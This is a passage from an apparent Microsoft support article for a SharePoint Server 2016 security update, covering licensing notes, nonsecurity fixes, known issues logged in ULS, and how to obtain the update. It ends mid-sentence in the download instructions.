OneDrive for Business modern user experience requires an active Software Assurance contract at the time that the experience is enabled, either by installation of the public update or by manual enablement. If you don't have an active Software Assurance contract at the time of enablement, you must turn off the OneDrive for Business modern user experience.For more information, see the following Microsoft Docs articles:\n * [New features included in the November 2016 Public Update for SharePoint Server 2016 (Feature Pack 1)](<https://go.microsoft.com/fwlink/?linkid=832679>)\n * [New features included in the September 2017 Public Update for SharePoint Server 2016 (Feature Pack 2)](<https://go.microsoft.com/fwlink/?linkid=856819>)\n\n## Improvements and fixes\n\nThis update contains security and reliability improvements.This security update also contains fixes and improvements for the following nonsecurity issues in SharePoint Server 2016:\n\n * Improves the performance of certain database operations that are done by the SharePoint Products Configuration Wizard (PSConfig), Timer service jobs, and other features.\n * Fixes an issue in which you receive the following error message when you try to clear a filter by using indexed columns in a SharePoint list that has many items: \n**Cannot show the value of the filter. The field may not be filterable, or the number of items returned exceeds the list view threshold enforced by the administrator.**\n * Fixes an issue in which Web Parts that depend on **WPProperty **don't work correctly. To enable the Web Parts to work, you have to also follow the steps that are provided in KB 5003528 to declare the affected .NET types to be allowed to access **WPProperty **in the Web.config file.\nThis security update also contains a fix for the following nonsecurity issue in Project Server 2016. Consider the following scenario:\n * On a task, you set the Status Manager.\n * You publish the project.\n * Later, while in the same editing session, you change the Status Manager settings.\n * You publish the project.\nIn this situation, the Status Manager property does not get updated in reporting. Instead of reflecting the new Status Manager, the old one is still observed.\n\n## Known issues in this update\n\n * **DataFormWebPart **may be blocked from accessing an external URL, and it generates \"8scdc\"event tags in SharePoint Unified Logging System (ULS) logs. For more information, see KB 5004210.\n * When third-party assemblies try to access some sensitive properties, user code might be blocked. When this issue occurs, \u201c8gaol\u201d event entries are logged in SharePoint Unified Logging System (ULS) logs. For example, you may find the following entry in ULS logs: \n \n**8gaol Unable to access this sensitive property : <sensitive property name> from outer assembly.**To fix this issue, install KB5002002 and follow the guidance in KB5004581 to enable trusted third-party assemblies.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB5001946>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through th